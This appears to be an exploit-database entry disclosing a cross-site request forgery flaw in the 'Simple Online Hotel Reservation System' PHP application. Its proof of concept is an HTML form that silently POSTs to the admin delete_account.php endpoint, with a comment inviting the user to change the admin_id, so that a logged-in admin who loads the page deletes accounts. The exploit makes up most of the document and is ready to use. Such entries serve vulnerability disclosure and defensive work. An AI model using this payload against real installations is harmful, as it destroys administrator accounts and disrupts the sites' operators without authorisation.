Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin)

Author: Mr Winst0n
type: webapps
platform: php
port: 
date_added: 2019-02-28  
date_updated: 2019-02-28  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 46463.html  

# Exploit Title: Simple Online Hotel Reservation System  - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 25, 2019
# Vendor Homepage: https://code-projects.org/
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
# Tested on: Kali linux, Windows 8.1

# PoC:

<html>
<head>
	<title>Delete Admin</title>
</head>
<body>
	<form method = "POST" action="http://localhost/[PATH]/admin/delete_account.php?admin_id=1">
		<!-- You can change admin_id -->
		<button>Delete</button>
	</form>
</body>
</html>